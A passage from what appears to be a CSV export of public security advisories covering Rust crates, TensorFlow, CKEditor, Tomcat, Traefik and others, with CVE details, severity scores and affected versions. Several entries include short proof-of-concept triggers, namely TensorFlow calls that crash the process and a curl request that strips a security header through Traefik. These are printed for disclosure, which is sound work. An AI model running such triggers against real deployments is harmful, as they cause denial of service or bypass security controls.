`char::from_u32_unchecked`,"The Windows implementation of this crate relied on the behavior of std::char::from_u32_unchecked when its safety clause is violated. Even though this worked with Rust versions up to 1.42 (at least), that behavior could change with any new Rust version, possibly leading a security issue. + +The flaw was corrected in version 2.0.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'os_str_bytes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35865'}, {'type': 'WEB', 'url': 'https://github.com/dylni/os_str_bytes/pull/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/dylni/os_str_bytes'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0012.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:17Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-2f5j-3mhq-xv58,2023-06-13T22:04:49Z,2021-08-25T20:58:15Z,,['CVE-2020-36434'],Double free in sys-info ,"Affected versions of sys-info use a static, global, list to store temporary disk information while running. The function that cleans up this list, DFCleanup, assumes a single threaded environment and will try to free the same memory twice in a multithreaded environment. This results in consistent double-frees and segfaults when calling sys_info::disk_info from multiple threads at once. The issue was fixed by moving the global variable into a local scope.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sys-info'}, 'ecosystem_specific': {'affected_functions': ['sys_info::disk_info']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36434'}, {'type': 'WEB', 'url': 'https://github.com/FillZpp/sys-info-rs/issues/63'}, {'type': 'PACKAGE', 'url': 'https://github.com/FillZpp/sys-info-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/sys-info/RUSTSEC-2020-0100.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0100.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:16:40Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-mh6h-f25p-98f8,2023-06-13T20:32:32Z,2021-08-25T20:44:05Z,,['CVE-2019-15544'],Uncontrolled memory consumption in protobuf,Affected versions of this crate called Vec::reserve() on user-supplied input. This allows an attacker to cause an Out of Memory condition while calling the vulnerable method on untrusted data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'protobuf'}, 'ecosystem_specific': {'affected_functions': ['protobuf::stream::read_raw_bytes_into']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15544'}, {'type': 'WEB', 'url': 'https://github.com/stepancheg/rust-protobuf/issues/411'}, {'type': 'PACKAGE', 'url': 'https://github.com/stepancheg/rust-protobuf'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r00097d0b5b6164ea428554007121d5dc1f88ba2af7b9e977a10572cd@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ef574a5621b0e670a3ce641e9922543e34f22bf4c9ee9584aa67fcf@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7fed8dd9bee494094e7011cf3c2ab75bd8754ea314c6734688c42932@%3Ccommon-issues.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd64381fb8f92d640c1975dc50dcdf1b8512e02a2a7b20292d3565cae@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0003.html'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:35Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}" +1.4.0,GHSA-qfpc-5pjr-mh26,2021-08-24T15:50:58Z,2021-08-25T14:41:23Z,,['CVE-2021-37677'],Missing validation in shape inference for `Dequantize`,"### Impact +The shape inference code for `tf.raw_ops.Dequantize` has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments: + +```python +import tensorflow as tf + +tf.compat.v1.disable_v2_behavior() +tf.raw_ops.Dequantize( + input_tensor = tf.constant(-10.0, dtype=tf.float32), + input_tensor = tf.cast(input_tensor, dtype=tf.quint8), + min_range = tf.constant([], shape=[0], dtype=tf.float32), + max_range = tf.constant([], shape=[0], dtype=tf.float32), + mode = 'MIN_COMBINED', + narrow_range=False, + axis=-10, + dtype=tf.dtypes.float32) +``` + +The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/ops/array_ops.cc#L2999-L3014) uses `axis` to select between two different values for `minmax_rank` which is then used to retrieve tensor dimensions. However, code assumes that `axis` can be either `-1` or a value greater than `-1`, with no validation for the other values. + +### Patches +We have patched the issue in GitHub commit [da857cfa0fde8f79ad0afdbc94e88b5d4bbec764](https://github.com/tensorflow/tensorflow/commit/da857cfa0fde8f79ad0afdbc94e88b5d4bbec764). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qfpc-5pjr-mh26'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37677'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/da857cfa0fde8f79ad0afdbc94e88b5d4bbec764'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-1284', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:50:15Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-7889-rm5j-hpgg,2022-02-08T21:01:48Z,2021-08-23T19:40:57Z,,['CVE-2021-32809'],Clipboard feature vulnerability allowing to inject arbitrary HTML into the editor using paste functionality,"### Affected packages +The vulnerability has been discovered in [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin. All plugins with [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin dependency are affected: + +* [clipboard](https://ckeditor.com/cke4/addon/clipboard) +* [pastetext](https://ckeditor.com/cke4/addon/pastetext) +* [pastetools](https://ckeditor.com/cke4/addon/pastetools) +* [widget](https://ckeditor.com/cke4/addon/widget) +* [uploadwidget](https://ckeditor.com/cke4/addon/uploadwidget) +* [autolink](https://ckeditor.com/cke4/addon/autolink) +* [tableselection](https://ckeditor.com/cke4/addon/tableselection) + +### Impact +A potential vulnerability has been discovered in CKEditor 4 [Clipboard](https://ckeditor.com/cke4/addon/clipboard) package. The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. It affects all users using the CKEditor 4 plugins listed above at version >= 4.5.2. + +### Patches +The problem has been recognized and patched. The fix will be available in version 4.16.2. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.2'}, {'fixed': '4.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32809'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:49:10Z', 'nvd_published_at': '2021-08-12T17:15:00Z'}" +1.4.0,GHSA-88cw-3m6x-49f7,2021-07-29T20:39:52Z,2021-08-02T17:25:58Z,,['CVE-2020-17054'],Out-of-bounds Write in ChakraCore,Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17048.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.23'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17054'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6528'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/pull/6528/commits/e81e8a51ec7ba3d0dfb6089254f166c2733216e1'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17054'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T19:10:19Z', 'nvd_published_at': '2020-11-11T07:15:00Z'}" +1.4.0,GHSA-9p9m-9xww-qjcx,2021-08-19T21:21:44Z,2021-08-25T20:45:06Z,,['CVE-2020-25791'],Array size is not checked in sized-chunks,"An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit().","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25791'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-6p5r-g9mq-ggh2,2021-08-24T13:11:42Z,2021-08-25T14:42:49Z,,['CVE-2021-37658'],Reference binding to nullptr in `MatrixSetDiagV*` ops,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixSetDiagV*`: + +```python +import tensorflow as tf + +tf.raw_ops.MatrixSetDiagV3( + input=[1,2,3], + diagonal=[1,1], + k=[], + align='RIGHT_LEFT') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong: + +```cc + auto& diag_index = context->input(1); + ... + lower_diag_index = diag_index.flat()(0); +``` + +### Patches +We have patched the issue in GitHub commit [ff8894044dfae5568ecbf2ed514c1a37dc394f1b](https://github.com/tensorflow/tensorflow/commit/ff8894044dfae5568ecbf2ed514c1a37dc394f1b). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6p5r-g9mq-ggh2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37658'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ff8894044dfae5568ecbf2ed514c1a37dc394f1b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:11:42Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-f8h4-7rgh-q2gm,2021-08-23T22:09:33Z,2021-08-25T14:43:24Z,,['CVE-2021-37650'],"Segfault and heap buffer overflow in `{Experimental,}DatasetToTFRecord`","### Impact +The implementation for `tf.raw_ops.ExperimentalDatasetToTFRecord` and `tf.raw_ops.DatasetToTFRecord` can trigger heap buffer overflow and segmentation fault: + +```python +import tensorflow as tf + +dataset = tf.data.Dataset.range(3) +dataset = tf.data.experimental.to_variant(dataset) +tf.raw_ops.ExperimentalDatasetToTFRecord( + input_dataset=dataset, + filename='/tmp/output', + compression_type='') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/data/experimental/to_tf_record_op.cc#L93-L102) assumes that all records in the dataset are of string type. However, there is no check for that, and the example given above uses numeric types. + +### Patches +We have patched the issue in GitHub commit [e0b6e58c328059829c3eb968136f17aa72b6c876](https://github.com/tensorflow/tensorflow/commit/e0b6e58c328059829c3eb968136f17aa72b6c876). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f8h4-7rgh-q2gm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37650'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e0b6e58c328059829c3eb968136f17aa72b6c876'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T22:09:33Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-44qp-qhfv-c7f6,2022-02-08T21:20:55Z,2021-08-13T15:21:02Z,,['CVE-2021-30639'],Improper Handling of Exceptional Conditions in Apache Tomcat,"A vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.3'}, {'fixed': '10.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.45'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.65'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30639'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10366'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r79a7c019712b39aedf7cf4da9276d80610f04441b2a4f6506cb2daaf@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r79a7c019712b39aedf7cf4da9276d80610f04441b2a4f6506cb2daaf@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd84fae1f474597bdf358f5bdc0a5c453c507bd527b83e8be6b5ea3f4%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0007/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T20:59:46Z', 'nvd_published_at': '2021-07-12T15:15:00Z'}" +1.4.0,GHSA-rh7x-ppxx-p34c,2021-08-19T20:53:37Z,2021-08-25T20:49:32Z,,['CVE-2020-35896'],Insufficient size checks in ws,"An issue was discovered in the ws crate through 2020-09-25 for Rust. The outgoing buffer is not properly limited, leading to a remote memory-consumption attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35896'}, {'type': 'WEB', 'url': 'https://github.com/housleyjk/ws-rs/issues/291'}, {'type': 'PACKAGE', 'url': 'https://github.com/housleyjk/ws-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0043.html'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:37Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-6q5w-m3c5-rv95,2021-08-19T21:08:01Z,2021-08-25T20:47:59Z,,['CVE-2020-35866'],Data races in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via VTab / VTabCursor.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35866'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/c9ef5bd63cad5c0c123344c072b490a1a9bcbe1f'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:01Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-m697-4v8f-55qg,2021-08-31T20:57:09Z,2021-08-05T17:04:21Z,,['CVE-2021-32813'],Header dropping in traefik,"# Impact + +There exists a potential header vulnerability in Traefik's handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse. + +# Details + +If you have a chain of Traefik middlewares, and one of them sets a request header `Important-Security-Header`, then sending a request with the following Connection header will cause it to be removed before the request was sent: + +``` +curl 'https://example.com' -H ""Connection: Important-Security-Header"" -0 +``` + +In this case, the backend does not see the request header `Important-Security-Header`. + +# Patches + +Traefik v2.4.x: https://github.com/traefik/traefik/releases/tag/v2.4.13 + +# Workarounds + +No. + +# For more information + +If you have any questions or comments about this advisory, [open an issue](https://github.com/traefik/traefik/issues). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/traefik/traefik/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/traefik/traefik'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.30'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/traefik/traefik/security/advisories/GHSA-m697-4v8f-55qg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32813'}, {'type': 'WEB', 'url': 'https://github.com/traefik/traefik/pull/8319/commits/cbaf86a93014a969b8accf39301932c17d0d73f9'}, {'type': 'WEB', 'url': 'https://github.com/traefik/traefik/releases/tag/v2.4.13'}, {'type': 'PACKAGE', 'url': 'github.com/traefik/traefik'}]","{'cwe_ids': ['CWE-913'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-04T18:54:19Z', 'nvd_published_at': '2021-08-03T23:15:00Z'}" +1.4.0,GHSA-fvhr-7j8m-3cvc,2021-08-24T19:08:25Z,2021-08-25T20:57:02Z,,['CVE-2020-36469'],Data races in appendix,"The `appendix` crate implements a key-value mapping data structure called +`Index` that is stored on disk. The crate allows for any type to inhabit +the generic `K` and `V` type parameters and implements Send and Sync for them +unconditionally. + +Using a type that is not marked as `Send` or `Sync` with `Index` can allow it +to be used across multiple threads leading to data races. 